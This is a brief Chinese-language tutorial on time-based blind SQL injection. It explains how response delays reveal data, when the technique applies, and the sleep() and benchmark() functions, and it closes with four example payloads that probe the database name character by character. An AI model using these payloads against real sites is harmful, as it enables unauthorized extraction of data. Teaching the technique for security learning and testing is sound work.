SQL注入——时间盲注

SQL注入时间盲注

---

1.何为时间盲注？

---

时间盲注又称延时注入，是一种SQL注入技术，其特点是通过页面的响应时间来判断是否存在SQL注入以及数据内容。时间盲注的核心原理是利用数据库中的延时函数或其他能导致执行时间延长的函数（如下）。

2.时间盲注适用哪些场景？

---

适用于没有数据回显的场景。

3.时间盲注所用的核心函数有哪些？

---

• sleep()
  用法：sleep(1)为沉睡1秒
• benchmark()
  用法：benchmark(1000,md5(1))为执行1000次md5(1)
  注：若执行次数太少，延时可能不明显。

4.payload示范

---

如:
id=1 and if(ascii(mid(database(),1,1))=65,sleep(2),1)
id=1 and sleep(ascii(mid(database(),1,1))=65)
id=1 and if(ascii(mid(database(),1,1))=65,benchmark(100000,md5(1)),1)
id=1 and benchmark((ascii(mid(database(),1,1))=65)*100000,md5(1))